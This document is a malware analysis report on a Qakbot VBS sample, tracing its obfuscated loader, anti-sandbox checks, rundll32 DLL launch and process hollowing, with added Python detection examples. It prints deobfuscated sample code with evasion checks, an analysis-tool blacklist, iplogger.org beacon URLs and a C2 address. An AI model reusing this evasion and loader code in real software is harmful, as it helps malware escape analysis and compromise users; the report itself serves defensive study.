QBOT Analysis

QBOT Analysis Report

Basic information

Sample name: qakbot
Sample type: VBS
Malware type: worm / remote-control trojan
Sample MD5: 2a4a6cc8bd52f618a0190a8529c82b7d
Sample SHA1: ef3d638377e245d7f388b41aad5e3525a8ccd2ed

Main execution flow

The sample arrives as a phishing email; the downloaded file is a VBS script. The VBS is heavily obfuscated. After running a series of anti-sandbox checks it launches the DLL it has generated; the DLL builds an .exe in memory, injects it into a misc.exe process, and that process then connects to the network and reads files.

Key techniques overview

Anti-sandbox

  • Checks whether total physical memory is less than 1030 MB
  • Checks whether the Downloads folder holds fewer than 3 files
  • Enumerates processes, checks for specific analysis-tool processes, and requires the process count to be greater than 28
  • Checks whether the number of processor cores is less than 3
  • Requires total logical-disk capacity greater than 60 GB
  • Checks that the system has been up for more than 10 minutes

Puppet process (process hollowing)

Injects into misc.exe and starts it as a puppet (hollowed) process

DLL

The DLL is started with rundll32 thyme.eot,DllRegisterServer, hiding the malicious code inside a rundll32 process

Detailed analysis

VBS analysis

The VBS uses ExecuteGlobal to run its code; adding the following code dumps the code that would be executed into a new VBS file instead of running it.

Dim fso, f
Set fso = WScript.CreateObject("Scripting.FileSystemObject")
Set f = fso.OpenTextFile("D:\output.txt", 2, True)   ' 2 = ForWriting, True = create the file if it is missing
' replace the sample's "ExecuteGlobal <code>" statement with "f.Write <code>"
' (followed by f.Close) so the decoded layer is written out instead of executed

Analysis of the new VBS

Function hydrogen255()
Dim article
Set article = CreateObject("ADODB.Stream")
With article
.Type = 2
.Charset = "ISO-8859-1"
.Open()
For Each prey257 in Array(eqaWMR, dwFB, fjFbt, fIT, whKINJ, TaC, NsyyZR, Ntwq, Xdvh, PBu, Dpiwm, RxzYzl, jAmeAf, IXP, pdiwb, eEZl, ImRXLL, PzqW, dxWL, VMQP, RRo, qGX, HAtVxn, AQhm, yWHkF, foFa, dqyE, Xfh, EzW, MYli, tyox, ESRVHk, hdkiQ, Mna, ufORvE, cszG, CQK, tNvnb, ElNsSR, ODchr, NeCph, KHslE, ONb, zBY, uRLZ, GZWRVa, SFE, uyEm, gkOhIN, zVLoy, RgBt, TdYe, odHjWc, dbjW, DheWY, WrVA, qcVYsN, qUoN, KTgee, Wytm, JDrD, nFtmoW, BPSSs, QJjubF, ATrzK, ENM, yUnWdJ, WJS, Htbq, OGbeq, XwVq, iKbUM, ZKf, wJhl, nVvZF, tjmi, SaQEIc, niXKuA, rXuvQU, zbmjY, PTit, iYr, QIq, iOjx, Loyh, xloOKa, jMUhG, HHQiX, VIeDfb, pZpH, HqKAo, rksozE, ifTT, diCHiA, SmCtwH, NMgj, aGmi, piVn, Zitl, wCS, wYC, BcHEx, wispgF, NNI, ZffJb, ekHbas, pztE, jwts, niskIE, WXm, Tsp, doVUqC, zokAMp, NhHND, RTWPOZ, hWoR, ihyi, jhp, WjTP, MSGvy, bGbd, vhwKQ, EAC, jcHlT, MJcyYj, CqV, mzMH, GAzN, igYm, CoIJ, URDhD, LUSfhd, YUuu, wirfcW, JHzK, UJL, WfVxS, viSiv, vujCZF, GLWIC, EHr, JNFd, gavawi, miEwbk, WnCGQb, kwJZ, QyLE, whn, AThTk, tPb692, SQpaIU, Dwe, YfY, JLIgB, FsGhVd, Idh, SfQK, meLv, lRw, mMxORK, Vroe, iUbBM, hggtzV, aTqk, qfH, iDAr, QEvu, fDgy, MfYsPZ, tOT, kwASp, TuCq, skl, NGsw, expyAC, NFs, aVYc, UPc, ZcFb, rsaSx, eMzqM, ndz, GyLN, PvDMPT, mNo, VcBpB, YOwqMh, GCo, OqVb, xcSgtL, rqG, Qvv, dEf, aQPQpl, HWvr, jFq, AKofCd, mYjD, eanOwo, yOMvpZ, IvwRM, nGrGRF, PgkZqM, VFNyP, HZC, YBd, GExMYL, dFBFW, utJ, HRq, GClkM, zYqaqA, ABR, mpgP, nhjjr, ysB, BBS, bpZoU, zJXsU, uVo, HUZUc, okt, NEfaC, DXrq, Vxh, vwC, rJIdmi, XPofC, yNIzb, rGqKTc, bHoVl, NqVrne, ObZQ, ZCfy, yhK, TMSF, Rfaf, QAf, JcYU, aLPCY, WYY, dUTCq, aydG, qSiDaE, akxtI, dhZE, mBeabd, dyafWP, APqI, uQS)
.WriteText determinate(prey257)
Next
.Position = 0
.SaveToFile octagon + "sprawl.zip", 2
.Close
End With
End Function

This function assembles the decoded chunks into an archive file (sprawl.zip) that contains a DLL.

Function squelch653()
Set lNXmE = CreateObject("WScript.Shell")
hSJfbN = lNXmE.ExpandEnvironmentStrings("%USERPROFILE%") + "\Downloads\" + "138874814" + ".txt"
If WScript.CreateObject("Scripting.FileSystemObject").FileExists(hSJfbN) Then
gyxmXVefWxvzyile = 0
Else
gyxmXVefWxvzyile = 1
End If
squelch653 = gyxmXVefWxvzyile
End Function
Function embrace912()
on error resume next
If (InStr(WScript.ScriptName, cStr(138874814)) > 0 And squelch653 = 0) Then
Exit Function
End If
Set genuineService = GetObject("winmgmts:\\.\root\cimv2")
Set SchlitzlItems = genuineService.ExecQuery("Select * from Win32_ComputerSystem")
For Each yardage569 In SchlitzlItems
OSUTCvbIeRPyUp = OSUTCvbIeRPyUp + Int((yardage569.TotalPhysicalMemory) / 1048576)
Next
If OSUTCvbIeRPyUp < 1030 Then
HxOPuqip
End If
End Function

Checks whether 138874814 has been downloaded (the marker file 138874814.txt in Downloads), then reads the computer's total physical memory through WMI and checks whether it is less than 1030 MB.

Function vhDzk()
If (InStr(WScript.ScriptName, "TESTING") > 0) Then
Exit Function
End If
raTrXQvHEJNbl("https://iplogger.org/1tRHp7")
Set genuineService = GetObject("winmgmts:Win32_Process")
genuineService.Create "rundll32" + " " + octagon + "thyme.eot" + ",DllRegisterServer"
Davidson
End Function

Checks whether the script name contains TESTING, downloads the file, and then starts the generated DLL:

rundll32 thyme.eot,DllRegisterServer

Function sywxVqpeDgv()
on error resume next
If (InStr(WScript.ScriptName, cStr(138874814)) > 0 And squelch653 = 0) Then
Exit Function
End If
abalone = 3
abalone_download = 3
REM the "If ... Then" line guarding the next call is missing from the excerpt of the sample:
REM HxOPuqip
REM End If
Set lNXmE = CreateObject("WScript.Shell")
hSJfbN = lNXmE.ExpandEnvironmentStrings("%USERPROFILE%") + "\Downloads\"
If CreateObject("Scripting.FileSystemObject").GetFolder(hSJfbN).Files.Count < abalone_download Then
HxOPuqip
End If
End Function

Checks whether the Downloads folder holds fewer than 3 files.

Function aspen()
on error resume next
If (InStr(WScript.ScriptName, cStr(138874814)) > 0 And squelch653 = 0) Then
Rutherford = Array("Munson vocate pathos weigh.  6853412 cattail cropland Olson woo,  9401202 Dianne lutanist, wellwisher liquid804 brink too bluejacket pithy conflict fluorine665 lettuce gold clay hideout dissipate energy592,  8047622 criteria shift hierarchal freeway132 Linus vagabond butternut.  4195194 goldfish folksy faze ")
Exit Function
REM admiration Phelps, protocol crump happy, cute voluble hyper ricotta clever713 apical Braille695 cheerleader gusset Britannic, sandstone vacuolate Bismark before riverfront77 tyke Nubia672 circular austenite aldehyde Canfield account saturater. pompadour telegram clamber tangy Baltimorean enthalpy assort rooftop, recital Wilshire laboratory Ibn.  1693647 Amoco.  2140279 dialectic datura 
End If
slow = Array("cockpit,  5168151 mucus McClure Arturo Houdini Madsen guilt diffeomorphic Caesarian moire567 portland vee court677 colic, icosahedral portent quonset733 inheritance ")
Schlitzproc = (19 - (20 - ((44 + (-21.0)) + (-22.0))))
RmGBQ = Array("frida-winjector-helper-64.exe","frida-winjector-helper-32.exe","pythonw.exe","pyw.exe","cmdvirth.exe","alive.exe","filewatcherservice.exe","ngvmsvc.exe","sandboxierpcss.exe","analyzer.exe","fortitracer.exe","nsverctl.exe","sbiectrl.exe","angar2.exe","goatcasper.exe","ollydbg.exe","sbiesvc.exe","apimonitor.exe","GoatClientApp.exe","peid.exe","scanhost.exe","apispy.exe","hiew32.exe","perl.exe","scktool.exe","apispy32.exe","hookanaapp.exe","petools.exe","sdclt.exe","asura.exe","hookexplorer.exe","pexplorer.exe","sftdcc.exe","autorepgui.exe","httplog.exe","ping.exe","shutdownmon.exe","autoruns.exe","icesword.exe","pr0c3xp.exe","sniffhit.exe","autorunsc.exe","iclicker-release.exe",".exe","prince.exe","snoop.exe","autoscreenshotter.exe","idag.exe","procanalyzer.exe","spkrmon.exe","avctestsuite.exe","idag64.exe","processhacker.exe","sysanalyzer.exe","avz.exe","idaq.exe","processmemdump.exe","syser.exe","behaviordumper.exe","immunitydebugger.exe","procexp.exe","systemexplorer.exe","bindiff.exe","importrec.exe","procexp64.exe","systemexplorerservice.exe","BTPTrayIcon.exe","imul.exe","procmon.exe","sython.exe","capturebat.exe","Infoclient.exe","procmon64.exe","taskmgr.exe","cdb.exe","installrite.exe","python.exe","taslogin.exe","ipfs.exe","pythonw.exe","tcpdump.exe","clicksharelauncher.exe","iprosetmonitor.exe","qq.exe","tcpview.exe","closepopup.exe","iragent.exe","qqffo.exe","timeout.exe","commview.exe","iris.exe","qqprotect.exe","totalcmd.exe","cports.exe","joeboxcontrol.exe","qqsg.exe","trojdie.kvpcrossfire.exe","joeboxserver.exe","raptorclient.exe","txplatform.exe","dnf.exe","lamer.exe","regmon.exe","virus.exe","dsniff.exe","LogHTTP.exe","regshot.exe","vx.exe","dumpcap.exe","lordpe.exe","RepMgr64.exe","winalysis.exe","emul.exe","malmon.exe","RepUtils32.exe","winapioverride32.exe","ethereal.exe","mbarun.exe","RepUx.exe","windbg.exe","ettercap.exe","mdpmon.exe","runsample.exe","windump.exe","fakehttpserver.exe","mmr.exe","samp1e.exe","winspy.exe","fakeserver.exe","mmr.exe","sample.exe","wireshark.exe","Fiddler.exe","multipot.exe","sandboxiecrypto.exe","XXX.exe","filemon.exe","netsniffer.exe","sandboxiedcomlaunch.exe")
Set genuineService = GetObject("winmgmts:\\.\root\cimv2")
Set SchlitzlItems = genuineService.ExecQuery("Select * from Win32_Process")
For Each yardage569 In SchlitzlItems
Schlitzproc = Schlitzproc + 1
For Each lull In RmGBQ
If yardage569.Name = lull Then
HxOPuqip
End If
congest = Array("ash logistic point mice. Cooley279 terrific backlash Cayley diabolic academia.  4015680 ")
Next
Next
If (Schlitzproc < 28) Then
HxOPuqip
End If
End Function

Enumerates processes, checks for any of the processes listed above, and requires the process count to be greater than 28.

Function oVsalcUXqH()
on error resume next
idiocy = Array("padlock dispense nude writeup isotope hurdle NNE manifold Alhambra bathrobe ")
If (InStr(WScript.ScriptName, cStr(138874814)) > 0 And squelch653 = 0) Then
Exit Function
End If
qjuTaToPfH = 19
if (qjuTaToPfH >10) Then
Lois = Array(203, 131, 134, 244, 113)
Dim lNXmE:Set lNXmE = CreateObject("WScript.Shell")
iJlspJLIUDzfkec = lNXmE.RegRead("HKEY_CURRENT_USER\Control Panel\International\Geo\Nation")
For Each blaggqaWLasno In Lois
If (blaggqaWLasno = Cint(iJlspJLIUDzfkec)) Then
raTrXQvHEJNbl("https://iplogger.org/1ys2w7")
Davidson
Magellanic
WScript.Quit
End If
Next
End if
End Function

Queries the region from the registry; if it is Russia, North Korea, South Korea, India, or the United States, the attack is not carried out.

Function lXKrbqmJL()
Thimbu = Array("Bryn pituitary BEMA lamentation centerline initiate929. sever airframe.  4639378 atrocity Achaean handiwork indefinite emeritus land385 memo will leach527 Crawford littermate Brownell bootleg omicron McCluskey Britain uptrend incorrect Arapaho fluorspar gratuity genetic Wyatt hare giant ignominious526 digit minefield ")
on error resume next
If (InStr(WScript.ScriptName, cStr(138874814)) > 0 And squelch653 = 0) Then
Exit Function
End If
Set genuineService = GetObject("winmgmts:\\.\root\cimv2")
Set SchlitzlItems = genuineService.ExecQuery("Select * from Win32_Processor", , ((13 + (45 + 476.0)) - (80 + 406.0)))
For Each yardage569 In SchlitzlItems
If yardage569.NumberOfCores < 3 Then
js = True
End If
Next
If js Then 
HxOPuqip
End If
End Function

Checks whether the processor core count is less than 3.

Function cancelling()
on error resume next
If (InStr(WScript.ScriptName, cStr(138874814)) > 0 And squelch653 = 0) Then
Exit Function
End If
Set genuineService = GetObject("winmgmts:\\.\root\cimv2")
Set SchlitzlItems = genuineService.ExecQuery("Select * from Win32_LogicalDisk")
For Each yardage569 In SchlitzlItems
OSUTCvbIeRPyUp = OSUTCvbIeRPyUp + Int(yardage569.Size / 1073741824)
Next
If OSUTCvbIeRPyUp < ((1346 - (17 + 1261.0)) - (35 + (-27.0))) Then
HxOPuqip
End If
gazette = Array("wholesome paratroop, sweat glibly854 youll524 coop487 haggle Burton impractical sorrowful rangy Bradshaw titanate discrepant Willa threesome curse. coax inadvertent. motet42 fanciful Zeiss gangling Toby hast Seattle gazelle ")
End Function

Requires total logical-disk capacity greater than 60 GB.

Function nobody()
on error resume next
If (InStr(WScript.ScriptName, cStr(138874814)) > 0 And squelch653 = 0) Then
Exit Function
End If
set genuine = GetObject("winmgmts:\\.\root\cimv2")
set SchlitzlOS = genuine.InstancesOf("Win32_OperatingSystem")
for each pETHE in SchlitzlOS
Greek = pETHE.LastBootUpTime
epitaph = Mid(Greek,1,4) & "-" & Mid(Greek,5,2) & "-" & Mid(Greek,7,2) & " " & Mid(Greek,9,2) & ":" & Mid(Greek,11,2) & ":" & Mid(Greek,13,2)
yILnUa = abs(datediff("s",epitaph,now))
vExpzOWrRRxABd = yILnUa \ 60
ATGUDnudZJB = vExpzOWrRRxABd \ 60
vExpzOWrRRxABd = vExpzOWrRRxABd mod 60
bYcZzT = bYcZzT mod 60
If (ATGUDnudZJB = 0 And vExpzOWrRRxABd < 10) Then
HxOPuqip 
End If
next
End Function

Checks that the system has been up for more than 10 minutes.

Function courtyard461()
Dim nykqLizQPRqffvA: Set nykqLizQPRqffvA = CreateObject("WScript.Shell")
Dim indescribable: Set indescribable = CreateObject("Scripting.FileSystemObject")
If (indescribable.FileExists(octagon + "microsoft.url")) Then
Magellanic
WScript.Quit
Else
With nykqLizQPRqffvA.createShortcut(octagon + "adobe.url")
.TargetPath = "https://adobe.com"
.Save()
End With
End If
End Function

Checks whether the file microsoft.url exists; if it does, the script exits. If not, it creates adobe.url.
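As an added example (not code from the post or from the sample), the checks above reduced to one function that a sandbox operator can run against a host profile to see which of them would make the sample bail out; the host profiles, the reference time and the GeoID 94 used for the tuned VM are constructed.

```python
from datetime import datetime

# GeoIDs the sample refuses to run in (HKCU\Control Panel\International\Geo\Nation)
BLOCKED_GEO_IDS = {203, 131, 134, 244, 113}
# a handful of names from the sample's process blacklist; the comparison is
# exact (case-sensitive), as VBScript's "=" on strings is
ANALYSIS_PROCESSES = {"wireshark.exe", "procmon.exe", "procexp.exe",
                      "ollydbg.exe", "idaq.exe", "windbg.exe", "Fiddler.exe"}

def uptime_minutes(last_boot: str, now: datetime) -> int:
    """Convert WMI LastBootUpTime (yyyymmddHHMMSS.ffffff+UUU) the way the
    sample does: take the first 14 characters, ignore the UTC offset."""
    boot = datetime.strptime(last_boot[:14], "%Y%m%d%H%M%S")
    return int(abs((now - boot).total_seconds()) // 60)

def failing_checks(host: dict, now: datetime) -> list:
    """Names of the checks that would make the sample stop on this host."""
    failed = []
    if host["physical_memory_mb"] < 1030:
        failed.append("memory<1030MB")
    if host["downloads_file_count"] < 3:
        failed.append("downloads<3files")
    if any(p in ANALYSIS_PROCESSES for p in host["processes"]):
        failed.append("analysis_tool_running")
    if len(host["processes"]) < 28:
        failed.append("processes<28")
    if host["cores"] < 3:
        failed.append("cores<3")
    if host["disk_total_gb"] < 60:
        failed.append("disk<60GB")
    if uptime_minutes(host["last_boot"], now) < 10:   # hours == 0 and minutes < 10
        failed.append("uptime<10min")
    if host["geo_nation"] in BLOCKED_GEO_IDS:
        failed.append("blocked_region")
    if host["microsoft_url_present"]:                 # the courtyard461 marker file
        failed.append("marker_file_present")
    return failed

# constructed host profiles (not real telemetry)
NOW = datetime(2020, 6, 1, 12, 0, 0)
DEFAULT_VM = {   # a freshly booted, minimal analysis VM
    "physical_memory_mb": 1024, "downloads_file_count": 0,
    "processes": ["explorer.exe", "procmon.exe", "wscript.exe"],
    "cores": 2, "disk_total_gb": 40, "geo_nation": 244,
    "last_boot": "20200601115500.000000+000", "microsoft_url_present": False,
}
TUNED_VM = dict(DEFAULT_VM, physical_memory_mb=4096, downloads_file_count=5,
                processes=["svc%d.exe" % i for i in range(30)], cores=4,
                disk_total_gb=120, last_boot="20200601100000.000000+000",
                geo_nation=94)   # any GeoID outside the blocked set
```

failing_checks(DEFAULT_VM, NOW) lists eight tripped checks, failing_checks(TUNED_VM, NOW) returns an empty list.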

DLL analysis

The DLL generates a new exe and loads and runs it in memory; when extracted, however, that exe does not run on its own.

New exe

Suspends misc.exe (the target process)

Writes into the remote process's memory, starting at address 0x70000

Writes into the remote process's memory again, starting at address 0xb0000

GetThreadContext

SetThreadContext sets the start address

ResumeThread // 0x419a3a

Puppet process (process hollowing)
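An added detection example (not code from the post): the rundll32 launch of thyme.eot via DllRegisterServer from the VBS analysis, and the hollowing sequence just shown, reduced to two checks, one over process command lines and one over an API-call trace; the pids, the path to thyme.eot, the image names and the event format are assumptions.

```python
import re

# "rundll32 <file>,<export>"; the sample's launch line is rundll32 thyme.eot,DllRegisterServer
RUNDLL32_RE = re.compile(r"rundll32(?:\.exe)?\s+(\S+),(\w+)", re.IGNORECASE)

def suspicious_rundll32(cmdline: str) -> bool:
    """True when rundll32 is handed a file that is not a .dll together with the
    DllRegisterServer export, the way the sample starts thyme.eot."""
    m = RUNDLL32_RE.search(cmdline)
    if not m:
        return False
    path, export = m.group(1), m.group(2)
    return not path.lower().endswith(".dll") and export == "DllRegisterServer"

def find_hollowing(events: list) -> list:
    """Pids of processes that went suspended create -> remote write(s) ->
    SetThreadContext -> ResumeThread, the order seen in the debugger above."""
    stage = {}                              # child pid -> stage reached
    hits = []
    for ev in events:
        api, pid = ev["api"], ev["target"]
        if api == "CreateProcess" and ev.get("suspended"):
            stage[pid] = "suspended"
        elif api == "WriteProcessMemory" and stage.get(pid) in ("suspended", "written"):
            stage[pid] = "written"
        elif api == "SetThreadContext" and stage.get(pid) == "written":
            stage[pid] = "context_set"
        elif api == "ResumeThread" and stage.get(pid) == "context_set":
            hits.append(pid)
            stage[pid] = "resumed"
    return hits

# constructed API trace (not captured telemetry) mirroring the steps above
TRACE = [
    {"api": "CreateProcess", "target": 1300, "image": "misc.exe", "suspended": True},
    {"api": "WriteProcessMemory", "target": 1300, "address": 0x70000},
    {"api": "WriteProcessMemory", "target": 1300, "address": 0xB0000},
    {"api": "GetThreadContext", "target": 1300},
    {"api": "SetThreadContext", "target": 1300},
    {"api": "ResumeThread", "target": 1300},
    {"api": "CreateProcess", "target": 1400, "image": "notepad.exe", "suspended": False},
    {"api": "ResumeThread", "target": 1400},   # a benign resume with no prior writes
]
```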

Queries registry values under

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion

InstallDate, DigitalProductId

Creates folders

"C:\Users\Administrator\AppData\Roaming\Mogi"

"C:\Users\Administrator\AppData\Roaming\Noov"

"C:\Users\Administrator\AppData\Roaming\Iqbe"

"C:\Users\Administrator\AppData\Roaming\Soyk"

"C:\Users\Administrator\AppData\Roaming\bydyac"

Opens registry keys with RegCreateKeyExW

Opens files

Network connections use HTTPS

pecketil.org

Sends a POST request with HttpOpenRequest()

with dwFlags set to

GOPHER_TYPE_PDF (that symbolic name shares the value 0x00800000 with INTERNET_FLAG_SECURE, the flag an HTTPS request actually uses)

The URL passed to InternetCrackUrlA is https://pecketil.org/sound.php

A series of URLs was found

Serving a simulated file at that URL showed the sample reading the simulated file.

